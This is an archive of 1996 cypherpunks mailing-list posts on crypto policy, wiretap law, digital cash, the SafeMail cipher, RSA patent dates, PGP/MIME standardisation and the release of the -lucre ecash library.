> Which crowd of lawyers was this?  Must have been after open bar.

An US DoJ attorney, but that may not say much.

> Look it up, the doctrine is called "fruit of the poisonous tree."

We discussed this doctine, but it was pointed out to me that as long
as they can come up with some plausible alternative reason for having
the information related to the intercept (say, they were bugging some
suspicious neighbor and "accidentally" tap the wrong phone line) then
I would never find out that the real intercept ever took place.

By law, technically, the phone company/tapping party would have to
let me know that I had been tapped in 30 days.  In practice, I wonder.

> That evidence will have to survive a hearing on exclusion.  Highly
> unlikely if you were accidently overheard.

Yes.  We discussed this part too.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@XENON.chromatic.com>
Date: Thu, 20 Jun 1996 09:07:44 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: Source Laundering <was: You bet they have/are: NSA/CIA to snoop INSIDE the U.S.???>
In-Reply-To: <v02140b01adec77b9e9ea@[206.243.160.205]>
Message-ID: <199606191734.KAA26918@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



This would be most cool.  In fact, cypherpunks should patent it,
and reap licensing fees from government/military use (keeping it
free for civilian use).

Ern

>         A thought:  Being pessimistic lately, and assuming our elected US
> pols continue their subservience to the spy agencies, I have a question.
> How difficult would be it to concoct a encryption-based scheme which would
> hold escrow keys in some sort of serialized time-sensitive one-way account
> -- a device that would make it all but impossible to get a key out of the
> account without leaving a permanent record that it was retrieved.  How many
> were retrieved?  When? By whom?
>
>         Is there such a scheme?  How does/could it work?
>
>         In defending privacy,  Accountability is a very powerful weapon.
> (Remember those FBI reports of 7-11 wiretaps?) I'd love to see such a
> tamperproof recording device imposed upon the FBI's access to its new
> Master Wiretap circuits, for example -- with a legislatively-mandated
> revelation of the unforgable results,  something comparable to the current
> law in criminal cases, and maybe with some 5-year sunshine provison for
> national security cases.
>
>         Such a scheme might be all we can get if this Administration or a
> future one gets a version of Clipper mandated.
> 
>         Cynics like many of you on this list may not realize how
> desperately these guys want to keep to the shadows.  Bright Lights and
> Accountability ought to be a Cypherpunk Goal -- even when the tide is
> running against us.  A well-documented tamperproof accounting scheme to
> document the use of these intrusive powers could result in a potentially
> powerful piece of legislation.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 20 Jun 1996 10:22:48 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: Digital Cash application
Message-ID: <199606191813.LAA27918@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:24 PM 6/19/96 -0500, Declan McCullagh wrote:
>Jim:
>
>This is a nice idea, but it's not going to happen.
>
>Yes, Harry Browne has raised enough money to qualify for matching funds
>from the FEC. But he's unable to give out the cash or use it to pay down
>the gvt debt since doing so could violate FEC regulations. The FEC is also
>unwilling only to certify Browne for matching funds without giving it to
>him -- he's got to take the money and spend it on campaign foo and nothing
>else, says the government. Finally, once they give you cash you have to
>meet a higher degree of scrutiny, which costs money in lawyers and
>accountants.
>Talk about bureaucracy.
>At least this is what the party tells me. I'll be covering their
>convention, which is in DC a few weeks from now.

It seems to me that since paying people funds that were stolen from them 
would produce good publicity, which by definition could be argued to be 
spending it on the campaign.  Sure, it's a non-traditional tactic, but that 
doesn't mean it's in violation of the campaign law.  They could also email 
along a set of libertarian literature, and the recipient would certify that 
he would promote the libertarian cause and work for the election of the 
candidate, etc, etc.

As for "lawyers and accountants":  I'm sure there are enough 
libertarian-leaning lawyers and accountants around who would be willing to 
help out to make this project a net positive.  Remember, the publicity is 
the important thing.



>
>-Declan
>
>
>>In 1996, the Libertarian Party will apparently qualify for Federal matching
>>funds for its Presidential political campaign.  That does not mean that it
>>will _accept_ them, being stolen goods.  However, a few years ago I heard of
>>an idea that they should accept the money, and return it to the people, a
>>small amount at a time, to whomever asks for it.  Besides returning the
>>stolen money to its rightful owners, that would produce substantial positive
>>publicity for the Libertarian party, embarrassment for the Democrats and
>>Republicans, while at the same time reducing the amount of money available
>>for the D's and the R's.
>>
>>
>>But there's been a practical question of how to actively do this,
>>economically.  Issuing checks and mailing them costs money, and they're
>>traceable, etc.    The advent of digital cash suggests an answer: Make the
>>payments in the form of digital cash, payable on the Web.  This will
>>encourage the use of digital cash, and provide a sudden infusion that will
>>promote other uses.  There's another advantage, however.  Since "Netizens"
>>are somewhat biased towards libertarianism, this will have the effect of
>>keeping more of this money "in the family" as it were, while at the same
>>time being open, technically, to everyone who can get on the 'net.
>>
>>
>>Jim Bell
>>jimbell@pacifier.com
>
>
>
>
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 20 Jun 1996 07:42:54 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: SafE Mail Corporation
In-Reply-To: <Pine.SUN.3.93.960618154407.20055A-100000@polaris>
Message-ID: <199606191542.LAA25691@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Black Unicorn writes:
> Calling a given cypher "uncrackable" is simple fiction or ignorance.

I will point out for the benefit of all that technically there is one
cipher that is unbreakable if it is properly implemented -- the one
time pad. However, Black Unicorn's point is generally correct --
information theory dictates that any system other than a one time pad
can in theory be broken by brute force once you have ciphertext longer
than the unicity distance, which is typically quite short. Unicity
distance depends only on the redundancy of the language and the key
length in bits (well, technically, the base two log of the number
possible keys, but they are usually the same for conventional
cryptosystems -- it would make a difference for stuff like RSA but
since no one ever really cares about the unicity distance in practice
since that sort of brute force search is uninteresting...)

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Thu, 20 Jun 1996 08:27:57 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Safemail
Message-ID: <9606191626.AA24637@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 04:19 PM 6/18/96 -0400, you wrote:

>        SafeMail uses a proprietary Russian algorithm.

        Maybe it is GOST. Schneir covers it, and there is a white paper on
it at the b_crypt site.
_______________________
Regards,            Democracy is where you can say what you think 
                    even if you don't think. -
Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Thu, 20 Jun 1996 10:47:10 +0800
To: cypherpunks@toad.com
Subject: MasterCard Seeks Revision in On-Line Bill
Message-ID: <Pine.BSI.3.91.960619122424.3783D-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




A MasterCard International official told a congressional committee 
Wednesday that encryption technology is "vital to the development and 
security" of a number of its products, including its smart card program.

Joel Lisker, MasterCard International senior vice president for security 
and risk management, testified in support of the "Promotion of Commerce 
On-Line an the Digital Era Act" bill.

But he urged that the legislation be amended to address security concerns 
arising from the resale and reexportation of encryption technology.

The bill, sponsored by Sen. Conrad Burns, R-Mont., would allow the 
unrestricted exportation of mass-market or public-domain encryption 
programs and permit the exportation of encryption technologies if similar 
programs are available outside the United States.

Encryption permits a message to be changed into a code that will keep 
information inaccessible to persons not authorized to have that information.

The bill would promote "cryptographic competition" by making it easier 
for U.S. companies to export encryption technology and remain competitive 
with foreign firms that can sell their products freely here, Mr. Lisker 
observed.

But Mr. Lisker urged that the bill be amended to increase the penalties 
for the rexportation and resale of this technology to questionable 
buyers, including criminals. "Modernizing the federal regulatory approach 
to encryption technology must be accomplished without weakening the 
ability of law enforcement agencies to pursue criminal activity," he 
testified.

Also submitting testimony at Wednesday's hearing before the Senate 
Subcommittee on science, technology, and space were representatives from 
Lotus, Netscape, Electronic Data Systems Corp., and America Online.


se7en





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Thu, 20 Jun 1996 13:03:31 +0800
To: cypherpunks@toad.com
Subject: On-Line Security Eyed For Florida St. ID Tool
Message-ID: <Pine.BSI.3.91.960619123743.3783G-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




V-One Corp. said it will be supplying a key security component to the 
smart card identification and transaction system that Florida State 
University is developing.

When the system, SmartWorld, is deployed later this year, students will 
gain access through the Internet to a host of applications touching on 
many aspects of campus life. Electronic financial transactions over the 
network will be secured through mutial authentication and encryption 
aided by the smart card.

V-One said it will provide its SmartGate "middleware," which allows 
virtually any application to run securely on public networks like the 
Internet. The agreement also provides for cross-training between V-One 
and Florida State personnel, and V-One technology will be incorporated in 
demonstrations that Florida State's Card Application Technology Center 
makes in marketing its system to other universities and colleges, 
government agencies, and other organizations.


se7en





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Einar Stefferud <Stef@nma.com>
Date: Thu, 20 Jun 1996 11:47:56 +0800
Subject: Re: Micropayments: myth?
In-Reply-To: <Pine.SGI.3.91.960610213300.11005B-100000@fully.organic.com>
Message-ID: <13618.835214087@odin.nma.com>
MIME-Version: 1.0
Content-Type: text/plain


Your analogy breaks because you do not provide for the corresponding
of connections between the gas tank and the dashboard indicator for
the case of buying small items from many different vendors.

I can see each vendor site giving you a "gas gauge" indicator, either
showing how much you have cumulatively charged at a given site, or how
much is left on your prepaid site account (these are the same thing in
terms of adding up charges), but I fail to see how your analog applies
outside the local control of each vendor site.

In short, you have again shown that microcharging systems are limited
to local accumulations.  Your gas tank example is limited to the car
you are driving, and does not tell you anything about anything else.

Unfortunately, you appear to be applying the idea to a collection of
vendors which you wish to visit, which means that someone somewhere
must be getting the disparate charges from different vendors to update
your singular gas gauge.

Drawing analogies is great fun, but all analogies break at some point
in their life, because they abstract away enough detail to paint a
simplified picture.  Sometime this leads to complete failure to map as
intended.

Best...\Stef

>From Brian Behlendorf's message Mon, 10 Jun 1996 21:49:05 -0700 (PDT):
}
[snip]....
}
}Now, let's consider bridging this metaphor into the micropayments world.  
}Imagine that surfing the web is like driving a car - you'll dribble out 
}small amounts of money over a period of time, but as long as you watch 
}your speedometer (the rate at which you spend money) and the fuel tank 
}levels (the amount of coinage in your wallet), you are in control of your 
}spending rates.  Whether you approve every micropayment explicitly, or 
}you set a minimum level below which requests for payments are automagically 
}granted, is up to you.  Me, I'd probably be alright with just about any 
}site I go to asking for less than $.02 for any action I take.  Anything 
}above that, I want to be explicitly asked.  My user interface has a gas 
}gauge and a speedometer in the upper-right-hand corner instead of a 
}throbbing "N".  When my levels are low, I go visit my bank and "refill" 
}my wallet.  Voila!
}
}The billing happens, as others have previously noted, entirely at the 
}client side.  There's no reason the wallet or web browser can't keep a 
}log of expenditures, and there's no chance for spoofery at that point 
}(the wallet knows where it sent money).  
}
}And yes, I am presuming a system involving transfers of digitally signed 
}tokens of some sort.  I don't think this is a mistaken presumption.  
}
}	Brian
}
}--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--
}brian@organic.com  |  We're hiring!  http://www.organic.com/Home/Info/Jobs/
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 20 Jun 1996 13:31:30 +0800
To: cypherpunks@toad.com
Subject: Re: German Federal Bank opposes e-cash
Message-ID: <199606192009.NAA04661@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 PM 6/19/96 +0200, Ulf Moeller wrote:
>[What follows is my translation of a Reuters news item as seen on a
>mailing list.]
>
>"Risks with computer money"
>
>Frankfurt - the Federal Bank has once more warned against security risks
>with computer money. There is the danger that "Cyber-Money" stored in
>computers be counterfeited, said Directory Board member Edgar Meister
>at a conference in Schwaebisch-Hall.

Then the banks just need to be more careful about issuing it, huh?

>In addition there were the danger
>of money laundry, because the computer money could be wired across
>borders without problems. 

Which, interestingly enough, is exactly the reason citizens should support 
it.  Barry Goldwater, the 1964 US Presidential candidate, said something 
like "Any government that is powerful enough to give you everything you 
want, is powerful enough to take away everything you have."    It was true, 
then, and it's true today.

Fast-forward to 1996:  Any government powerful enough to be able to 
eliminate money-laundering is powerful enough to eliminate all of our 
rights. I'm not willing to take that risk, and the way I see it, people who 
see digital cash as an undesirable risk to government are a risk to me.


Meister announced that, if necessary, the EU
>Central Banks would take counter-measures, should computer money and
>re-loadable payment cards endanger the monetary policy. (rtr/18.6.96)

Maybe somebody should tell Herr Meister that should actions of government be 
threatening, "Citizens would take counter-measures, should restrictions on 
computer money and reloadable payment cards endanger their rights."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Thu, 20 Jun 1996 11:03:33 +0800
To: cypherpunks@toad.com
Subject: Electronic Transaction Hardware Source
Message-ID: <Pine.BSI.3.91.960619131808.3920E-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain




Hypercom, 2851 W. Kathleen Road, Pheonix, AZ 85023, Tel: (602) 866-5399 
Fax: (602) 866-5380, (800) 578-2436 is advertising the following:

ICR1 Smart Card Reader and T7E Terminal;
CS7GC Signature Capture PIN Pad;
S8 Secure PIN Pad;
T7P Credit/Debit Terminal with Integrated Printer;
T7PRA Cellular Terminal

Have phun boys!!


se7en





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 20 Jun 1996 09:11:02 +0800
To: cypherpunks@toad.com
Subject: Oil Change software snoops through hard drive
Message-ID: <v01510115adedec5bd37a@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Alan forwarded this to me. Thought it might be interesting. -Declan

-------------------------------
Heads up: Privacy & Continuous Access Ks implicated by new software

This press release for a new product - a software agent - has
implications for privacy and continuing access issues, because it works
by scanning user's hard disks and automatically providing software
updates.
Unanswered Qs:
1) What other kinds of info does/can it troll for?
2) What does it do when it finds unregistered software?
3) Does it implicate ECPA?
4) Will updates be available through other means?
5) Must a user affirmatively grant permission to the software agent?
6) Can a user decline or limit the agent's access?
7) What uses may the agent's owner make of data collected?
etc.

Alan L
---
press release:

*** "Digital Oil Change"

CyberMedia announced today at PC Expo that it plans to automatically
"service"
personal computer software via the Net with a newly unveiled product
called
Oil Change. The company reports that Oil Change automatically replaces
outdated, bug-ridden software and hardware drivers with clean updates.
CyberMedia says the product is designed to use the Net to find, download,
and
install updates to Microsoft Windows 95 software applications and
drivers. Oil
Change reportedly tracks all currently installed versions and revisions
of all
Windows 95 software and hardware drivers on a PC, and then dials into
CyberMedia's Internet Web Server for related updates. Users in need of an
update are alerted by Oil Change with a description of what the update
will
do, and then the product finds the update on a software manufacturer's
Web
site, downloads, and installs it. Beginning today, CyberMedia says it
will
offer a free beta version of Oil Change for a limited time at its Web
site.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 20 Jun 1996 09:42:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Cash application
Message-ID: <v01510116adedf36279ef@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Jim:

This is a nice idea, but it's not going to happen.

Yes, Harry Browne has raised enough money to qualify for matching funds
from the FEC. But he's unable to give out the cash or use it to pay down
the gvt debt since doing so could violate FEC regulations. The FEC is also
unwilling only to certify Browne for matching funds without giving it to
him -- he's got to take the money and spend it on campaign foo and nothing
else, says the government. Finally, once they give you cash you have to
meet a higher degree of scrutiny, which costs money in lawyers and
accountants.

Talk about bureaucracy.

At least this is what the party tells me. I'll be covering their
convention, which is in DC a few weeks from now.

-Declan


>In 1996, the Libertarian Party will apparently qualify for Federal matching
>funds for its Presidential political campaign.  That does not mean that it
>will _accept_ them, being stolen goods.  However, a few years ago I heard of
>an idea that they should accept the money, and return it to the people, a
>small amount at a time, to whomever asks for it.  Besides returning the
>stolen money to its rightful owners, that would produce substantial positive
>publicity for the Libertarian party, embarrassment for the Democrats and
>Republicans, while at the same time reducing the amount of money available
>for the D's and the R's.
>
>
>But there's been a practical question of how to actively do this,
>economically.  Issuing checks and mailing them costs money, and they're
>traceable, etc.    The advent of digital cash suggests an answer: Make the
>payments in the form of digital cash, payable on the Web.  This will
>encourage the use of digital cash, and provide a sudden infusion that will
>promote other uses.  There's another advantage, however.  Since "Netizens"
>are somewhat biased towards libertarianism, this will have the effect of
>keeping more of this money "in the family" as it were, while at the same
>time being open, technically, to everyone who can get on the 'net.
>
>
>Jim Bell
>jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 20 Jun 1996 15:10:44 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: Current status of RSA patent...
In-Reply-To: <199606191956.PAA17079@toxicwaste.media.mit.edu>
Message-ID: <Pine.3.89.9606191305.A8074-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 19 Jun 1996, Derek Atkins wrote:

> > Can anyone provide additional information on the RSA patent status? 
> > If memory serves me, it is due to expire sometime in 1997. 
> 
> I think you need to replaces your SIMMs, your memory is faulty.  RSA
> lives until 2000 (or 2003, I forget); 1997 is Diffie-Helman.

SIMM replacment on both sides of the aisle.

Patent # 	4.200.770
Date:	 	3/29/80
Expiration:	3/29/97
Inventor(s)	Hellman, Diffie, Merkle
Coverage:	Diffie-Hellman Key Exchange

Patent #	4,405,829
Date:		9/20/83
Expiration:	9/20/2000
Inventor(s)	Rivest, Shamir, Adleman
Coverage:	RSA

> 
> > Also, what are the ramifications of deploying software based around it, 
> > such as PGP 2.62i (from UK)?
> 
> What you think would happen based on the fact that the patent hasn't
> expired.
> 

PGP 2.6.2i is not US codebase, and RSA is not patented outside the US 
according to Bruce Schneiner. Therefore, if a product was deployed into 
the US using a non-US codebase, it is unclear to me what legal 
jurisdiction (if any) RSA may have in these circumstances.

...Paul




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 20 Jun 1996 09:17:14 +0800
To: cypherpunks@toad.com
Subject: The IESG: Protocol Action: MIME Security with Pretty Good Privacy (PGP) to Proposed Standard
Message-ID: <199606191746.NAA25894@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

To: IETF-Announce:;
Cc: RFC Editor <rfc-editor@isi.edu>
Cc: Internet Architecture Board <iab@isi.edu>
From: The IESG <iesg-secretary@CNRI.Reston.VA.US>
Subject: Protocol Action: MIME Security with Pretty Good Privacy (PGP) to
	 Proposed Standard
Date: Wed, 19 Jun 96 11:06:28 -0400
Message-ID:  <9606191106.aa22287@IETF.CNRI.Reston.VA.US>



  The IESG has approved the Internet-Draft "MIME Security with Pretty
  Good Privacy (PGP)" <draft-elkins-pem-pgp-04.txt> as a Proposed
  Standard. This has been reviewed in the IETF but is not the product
  of an IETF Working Group.

  The IESG contact persons are Harald Alvestrand, Keith Moore, and Jeff
  Schiller.

Technical Summary

  This document describes how Pretty Good Privacy (PGP) can be used to
  provide privacy and authentication using the Multipurpose Internet
  Mail Extensions (MIME) security content types described in RFC1847.

Working Group Summary

  This document was not the product of an IETF working group but was
  reviewed via a 4 week IETF wide last call. The last call failed to
  raise any significant issues.

Protocol Quality

  This document was reviewed for the IESG by Jeffrey I. Schiller. The
  protocol provides for an elegant way of encapsulating PGP objects
  within a MIME framework by making use of Security Multiparts for MIME
  (RFC1847). This  permits a MIME aware user agent to read  and process
  PGP  signed and/or encrypted messages, yet it provides sufficient
  backwards compatibility for users with non-MIME aware mail user
  agents to make use of PGP directly to manually process messages
  prepared with this protocol.




------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Thu, 20 Jun 1996 09:58:02 +0800
To: cypherpunks@toad.com
Subject: [Free Beer] Talk on "Can Secrets be Stopped?" at Comp Lit.
Message-ID: <199606191756.NAA11735@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



After the talk tonight at Computer Literacy, I plan on buying a 
round or two of beers for cypherpunks. It's just a way of saying
"thank you" to the endless stream of information that the list
generates. I don't think I could have written the book without
the help of many on the list. 

The talk begins at Computer Literacy (2590 North First Street at
the corner of Trimble) at 6:30. It will cover some simple ways
to hide information (steganography) and it will be given at a 
very general level. The bookstore invited me to give the talk
to flog my book "Disappearing Cryptography." (For info about
the book, check out my web page http://access.digex.net/~pcw/pcwpage.html
)

The beer begins flowing at the Tide House after the talk and questions.
This is the Tide House at 65 North San Pedro at San Pedro Square
in downtown San Jose. They inform me that they offer validated
parking at some garage next door. 

The password for the evening will be "swordfish". I've gotten
to know some list members over the years via email and it would
be nice to meet you in person. 

For more information, call the bookstore at 408-435-5015. I would
also appreciate it if you could email me so I could get a preliminary
head count. Feel free to come at the last minute, but try and
send some notice.

-Peter Wayner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 20 Jun 1996 11:10:36 +0800
To: reagle@MIT.EDU
Subject: Re: Safemail
Message-ID: <9606191910.AA11834@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >        SafeMail uses a proprietary Russian algorithm.
> 
>         Maybe it is GOST. Schneir covers it, and there is a white paper on
> it at the b_crypt site.
> 

I spoke with a fellow there for about 20 minutes today about their 
program.  Sounded like these guys are just front-ends and 
obviously know nothing about the technology.  (Couldn't
answer how many bits of the "22 character" key were in use)

He did assure me it wasn't GOST, or anything published.
Story was that a Russian emigrant (sp?) came over to the US 
and this is his algorithm.  Apparently this person is 
not willing (at this time) to put the algorithm out for
public review. 

I spent most of my time pushing for some sort of peer review.
Supposedly they have talked with Schneier and Denning, about
the method but neither has done more than talk with them 
briefly about the method.  (I understood from what 
he said that they weren't willing to pay Bruce what it
would take to do a through review. ;-)

I also spent some time educating them about PGP
and how it does do compression, ASCII armour, etc.

All in all they guy was plesant enough, but no real 
details on how the system works.  What I got was that
they "private" key is what you type in.  This is then 
hashed (he even used the word hash) into a 22 character
public key that you share with your friends.  
Even at 8 bits/charcter, 176 bits doesn't sound secure
for a public key algorithm, but then again this isn't
RSA we are looking at.

All in all it still sounds like snake oil to me!

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Thu, 20 Jun 1996 09:33:25 +0800
To: cypherpunks@toad.com
Subject: Re: Federal key registrat
Message-ID: <TCPSMTP.16.6.19.14.18.54.2780269260.1177549@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 -=> Quoting In:nobody@c2.org to Harka <=-
 
 >Speaking to the Commonwealth Club of California in San Francisco, Reno said
 >her plan would require people to register with the new agency the secret
 >codes -- or "keys" -- they use to encrypt messages online.
 

My keys? Sure Janet, no problem. 
pgp -kg (80000 times)
Now can I email the hundred meg to you?

:)

Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 20 Jun 1996 10:06:11 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Cash application
Message-ID: <v0151011cadee02de1d68@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Whether it's a good idea or not -- and I'm told that it could violate FEC
rules -- it's not going to happen.

A campaign spokesperson told me that "Harry refuses" to take the cash, period.

-Declan



>At 01:24 PM 6/19/96 -0500, Declan McCullagh wrote:
>>Jim:
>>
>>This is a nice idea, but it's not going to happen.
>>
>>Yes, Harry Browne has raised enough money to qualify for matching funds
>>from the FEC. But he's unable to give out the cash or use it to pay down
>>the gvt debt since doing so could violate FEC regulations. The FEC is also
>>unwilling only to certify Browne for matching funds without giving it to
>>him -- he's got to take the money and spend it on campaign foo and nothing
>>else, says the government. Finally, once they give you cash you have to
>>meet a higher degree of scrutiny, which costs money in lawyers and
>>accountants.
>>Talk about bureaucracy.
>>At least this is what the party tells me. I'll be covering their
>>convention, which is in DC a few weeks from now.
>
>It seems to me that since paying people funds that were stolen from them
>would produce good publicity, which by definition could be argued to be
>spending it on the campaign.  Sure, it's a non-traditional tactic, but that
>doesn't mean it's in violation of the campaign law.  They could also email
>along a set of libertarian literature, and the recipient would certify that
>he would promote the libertarian cause and work for the election of the
>candidate, etc, etc.
>
>As for "lawyers and accountants":  I'm sure there are enough
>libertarian-leaning lawyers and accountants around who would be willing to
>help out to make this project a net positive.  Remember, the publicity is
>the important thing.
>
>
>
>>
>>-Declan
>>
>>
>>>In 1996, the Libertarian Party will apparently qualify for Federal matching
>>>funds for its Presidential political campaign.  That does not mean that it
>>>will _accept_ them, being stolen goods.  However, a few years ago I heard of
>>>an idea that they should accept the money, and return it to the people, a
>>>small amount at a time, to whomever asks for it.  Besides returning the
>>>stolen money to its rightful owners, that would produce substantial positive
>>>publicity for the Libertarian party, embarrassment for the Democrats and
>>>Republicans, while at the same time reducing the amount of money available
>>>for the D's and the R's.
>>>
>>>
>>>But there's been a practical question of how to actively do this,
>>>economically.  Issuing checks and mailing them costs money, and they're
>>>traceable, etc.    The advent of digital cash suggests an answer: Make the
>>>payments in the form of digital cash, payable on the Web.  This will
>>>encourage the use of digital cash, and provide a sudden infusion that will
>>>promote other uses.  There's another advantage, however.  Since "Netizens"
>>>are somewhat biased towards libertarianism, this will have the effect of
>>>keeping more of this money "in the family" as it were, while at the same
>>>time being open, technically, to everyone who can get on the 'net.
>>>
>>>
>>>Jim Bell
>>>jimbell@pacifier.com
>>
>>
>>
>>
>Jim Bell
>jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lucre@alpha.c2.org
Date: Thu, 20 Jun 1996 16:04:48 +0800
To: cypherpunks@toad.com
Subject: -lucre 0.8.1: ecash library for Unix available (with source, no blinding)
Message-ID: <199606192133.OAA22813@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

We are pleased to announce the 0.8.1 ALPHA release of -lucre, a C library
which implements the protocols of ecash(tm).  This library was developed for
research purposes, so source is available, but to avoid patent issues,
blinding of coins is not currently supported.  Please read the README
(appended below) for more detailed information.

You can currently get -lucre by anonymous ftp to csclub.uwaterloo.ca, in the
directory /pub/-lucre.

If you need to reach us, the development team for -lucre, you can try
<lucre@alpha.c2.org>.  Our public key is in the README, below.  There is
also a mailing list set up for discussing the library.  To subscribe,
send email to <majordomo@c2.org> with a message (_not subject_) of
"subscribe dev-lucre".

We are providing this library so that people can study how ecash works,
and possibly come up with innovative ways of incorporating ecash into
existing systems.  Paying for remailers, for example, is a topic that
seems to come up again and again on some mailing lists.  Hopefully, it
will also encourage more people to open an account with Mark Twain Bank;
the more people who are using ecash, and the more shops that accept ecash,
the better the system will be.  We believe in open systems, not "security
through obscurity", or the "trust me" model of security, and so we saw
a full-source release to be important.

The distribution comes with the library itself, as well as a very simple
ecash client.  The client should be usable to accept or pay ecash (or, if
you discover it doesn't fit your needs, you can change it yourself), but,
of course, you don't get the anonymity offered by the patented blinding
feature of ecash.

The README is attached below; please read it, as it contains more useful
information about the use of this library.


- -lucre version 0.8.1 README
- ---------------------------

This is version 0.8.1 of -lucre (We pronounce it ``dash lucre''; you can
pronounce it however you like), the Unofficial Cypherpunks Release of Ecash
(or ``Coderpunks'', if you want).  As the ``-l'' indicates, this is a C
library that implements the protocols of DigiCash's ecash (version
1.8.5, the kind used by Mark Twain Bank, not EUnet).  This is an ALPHA
release.  That is, future release may not even adhere to the same API.
This library was developed for, and is provided for, research purposes;
adjust your expectations of support accordingly.  As far as we know,
- -lucre will only work on Unix-style machines; it is unlikely that
we will release a Windows or Mac version.

- -lucre provides all of the basic things you would like (payment requests,
payments, deposits, withdrawals, opening accounts).  The format of the
wallet is somewhat different from that of DigiCash's standard client,
so it would probably be tough to use both that and -lucre with the same
MT bank account (maybe not, though; we haven't tried).

Most of the information used to produce this program came from
information published on the Web, Usenet, and various mailing lists, and
from analysis of the output of a logging packet forwarder.  The rest was
obtained from talking to various people, and from simple experimentation.
Because these are not ``official'' sources, some things may be incorrect.
Use at your own risk; there is always the possibility, when using ecash,
that your money will vanish into the bowels of the network.

To use this code, you will need the SSLeay package, which you can get from
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-0.5.2a.tar.gz, and the
Berkeley db package, which you can get from
ftp://ftp.cs.berkeley.edu/pub/4bsd/db.1.85.tar.gz.  Note especially that
the use of SSLeay is subject to restrictions in some countries, including the
US.  Also, as distributed, this package does _not_ do blinding of withdrawn
coins, as that process is patented by Dr. David Chaum.  If you manage to
license the patent, or if you fall under the ``Experimental Use Exception''
(in the US, and possibly other places), it's up to you to add in the blinding
code yourself.  In any case, and especially if you plan to use ecash
for commercial purposes, we would recommend that you contact competent legal
counsel.  Note that DigiCash publishes an ``official'' library for ecash,
though (at time of writing) it is much higher-level, and without source
available.  If that library would suit your needs, you are probably better off
using it instead of -lucre.

This library is _not_ in the public domain.  Currently, you may not modify
it, redistribute it, or distribute any program linked to it (dynamically
or staticly), without our explicit permission (signed by the public key
below).  This restriction is a reflection of the ALPHA version of the
library; it is likely that future versions will have more lenient
licensing agreements.

Some things we would like to put in future versions:

o Resending aborted withdrawals: the code to do this is in there, but the
   bank seems to think the repeated withdrawal message is a new withdrawal
   [We lost $0.23 learning this... :-( ].  We'll look into this further.

o An interface into resending and cancelling payments: all of the right info
   is currently being stored in the databases; only convenient functions
   to actually do the work are needed.

